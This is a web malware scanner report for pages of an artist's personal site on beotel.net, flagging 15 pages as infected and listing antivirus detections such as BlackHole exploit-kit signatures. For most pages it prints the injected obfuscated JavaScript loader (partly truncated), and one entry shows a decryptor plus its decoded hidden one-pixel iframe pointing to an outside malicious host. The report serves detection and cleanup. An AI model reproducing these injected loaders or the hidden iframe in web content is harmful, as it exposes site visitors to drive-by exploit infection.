New scan:

Malware Scanner report for beotel.net

Malicious/Suspicious/Total urls checked
15/0/16
15 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.beotel.net/~mrz/jana/content/paintings/atlantis.htm
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 14 Jan 2015 22:12:24 GMT
Location: http://users.beotel.net/~mrz/jana/content/paintings/atlantis.htm
Server: nginx/1.0.2
Content-Length: 184
Content-Type: text/html
clean
http://users.beotel.net/~mrz/jana/content/paintings/atlantis.htm
200 OK
Content-Length: 14340
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

pnfcu=String;tvlnip="spl"+"i"+"t";aleibo=window;tzqu=(1)?"0x":"123";ncqyko=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(hcane){xcgru=false;try{}catch(jqa){xcgru=21;}
if(1){nxje="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6d
... 3004 bytes are skipped ...
1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[tvlnip]("Zq");}aleibo=nxje;lacjy=[];for(cvyd=22-20-2;-cvyd+1406!=0;cvyd+=1){qvg=cvyd;if((0x19==031))lacjy+=pnfcu.fromCharCode(eval(tzqu+aleibo[1*qvg])+0xa-ncqyko);}dow=eval;z=123;if(Math.ceil(5.5)===6)dow(lacjy)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
Comodo
TrojWare.JS.Kryptik.xt
CAT-QuickHeal
HTM/Agent.NXJ
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS
BitDefender
JS:Exploit.BlackHole.OA

http://users.beotel.net/~mrz/jana/content/paintings/../../bio.html
200 OK
Content-Length: 42227
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS

http://users.beotel.net/~mrz/jana/content/paintings/../../main.html
200 OK
Content-Length: 13220
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

pnfcu=String;tvlnip="spl"+"i"+"t";aleibo=window;tzqu=(1)?"0x":"123";ncqyko=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(hcane){xcgru=false;try{}catch(jqa){xcgru=21;}
if(1){nxje="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6d
... 3004 bytes are skipped ...
1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[tvlnip]("Zq");}aleibo=nxje;lacjy=[];for(cvyd=22-20-2;-cvyd+1406!=0;cvyd+=1){qvg=cvyd;if((0x19==031))lacjy+=pnfcu.fromCharCode(eval(tzqu+aleibo[1*qvg])+0xa-ncqyko);}dow=eval;z=123;if(Math.ceil(5.5)===6)dow(lacjy)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
Comodo
TrojWare.JS.Kryptik.xt
CAT-QuickHeal
HTM/Agent.NXJ
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS
BitDefender
JS:Exploit.BlackHole.OA

http://users.beotel.net/~mrz/jana/content/paintings/../../paintings.html
200 OK
Content-Length: 14040
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

pnfcu=String;tvlnip="spl"+"i"+"t";aleibo=window;tzqu=(1)?"0x":"123";ncqyko=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(hcane){xcgru=false;try{}catch(jqa){xcgru=21;}
if(1){nxje="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6d
... 3004 bytes are skipped ...
1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[tvlnip]("Zq");}aleibo=nxje;lacjy=[];for(cvyd=22-20-2;-cvyd+1406!=0;cvyd+=1){qvg=cvyd;if((0x19==031))lacjy+=pnfcu.fromCharCode(eval(tzqu+aleibo[1*qvg])+0xa-ncqyko);}dow=eval;z=123;if(Math.ceil(5.5)===6)dow(lacjy)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
Comodo
TrojWare.JS.Kryptik.xt
CAT-QuickHeal
HTM/Agent.NXJ
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS
BitDefender
JS:Exploit.BlackHole.OA

http://users.beotel.net/~mrz/jana/content/paintings/../../index.html
200 OK
Content-Length: 13873
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,22,19,61,30,49,15,59,21,55,0,0,0,0,0,0,4,12,58,34,24,48,0,23,52,17,51,57,39,29,31,20,11,36,33,47,14,25,46,54,3,38,44,0,0,0,0,13,0,41,53,45,43,40,50,27,37,32,62,2,10,56,7,5,6,8,9,35,28,42,26,18,1,60,16);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("UfyEG2AfFGeHAntH_sKRO4DR_XAJk9tHD4qhn1ebGgAYnWtHIG3LluehGpcbxPZbFPyCpdyCpgZCH2SJsNVE8wTKHGrBL24hRXVJp0jKHJ0BQPAKCNT3EN4mQsrYnVUYlfyEG2AfFSKR")

Decoded script:


<iframe width="1" height="1" src="http://32tsdgseg.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"

Antivirus reports:

TrendMicro-HouseCall
Mal_Hifrm
TrendMicro
Mal_Hifrm

http://users.beotel.net/~mrz/jana/content/paintings/../../photo.html
200 OK
Content-Length: 13454
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS

http://users.beotel.net/~mrz/jana/content/paintings/../../instalations.html
200 OK
Content-Length: 13254
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

pnfcu=String;tvlnip="spl"+"i"+"t";aleibo=window;tzqu=(1)?"0x":"123";ncqyko=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(hcane){xcgru=false;try{}catch(jqa){xcgru=21;}
if(1){nxje="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6d
... 3004 bytes are skipped ...
1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[tvlnip]("Zq");}aleibo=nxje;lacjy=[];for(cvyd=22-20-2;-cvyd+1406!=0;cvyd+=1){qvg=cvyd;if((0x19==031))lacjy+=pnfcu.fromCharCode(eval(tzqu+aleibo[1*qvg])+0xa-ncqyko);}dow=eval;z=123;if(Math.ceil(5.5)===6)dow(lacjy)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
Comodo
TrojWare.JS.Kryptik.xt
CAT-QuickHeal
HTM/Agent.NXJ
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS
BitDefender
JS:Exploit.BlackHole.OA

http://users.beotel.net/~mrz/jana/content/paintings/../../video.html
200 OK
Content-Length: 13130
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS

http://users.beotel.net/~mrz/jana/content/paintings/../../content/video/dream.htm
200 OK
Content-Length: 17405
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

pnfcu=String;tvlnip="spl"+"i"+"t";aleibo=window;tzqu=(1)?"0x":"123";ncqyko=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(hcane){xcgru=false;try{}catch(jqa){xcgru=21;}
if(1){nxje="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6d
... 3004 bytes are skipped ...
1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[tvlnip]("Zq");}aleibo=nxje;lacjy=[];for(cvyd=22-20-2;-cvyd+1406!=0;cvyd+=1){qvg=cvyd;if((0x19==031))lacjy+=pnfcu.fromCharCode(eval(tzqu+aleibo[1*qvg])+0xa-ncqyko);}dow=eval;z=123;if(Math.ceil(5.5)===6)dow(lacjy)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
Comodo
TrojWare.JS.Kryptik.xt
CAT-QuickHeal
HTM/Agent.NXJ
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS
BitDefender
JS:Exploit.BlackHole.OA

http://users.beotel.net/~mrz/jana/content/paintings/../../content/video/../../bio.html
200 OK
Content-Length: 42227
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS

http://users.beotel.net/~mrz/jana/content/paintings/../../content/video/../../main.html
200 OK
Content-Length: 13220
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

pnfcu=String;tvlnip="spl"+"i"+"t";aleibo=window;tzqu=(1)?"0x":"123";ncqyko=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(hcane){xcgru=false;try{}catch(jqa){xcgru=21;}
if(1){nxje="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6d
... 3004 bytes are skipped ...
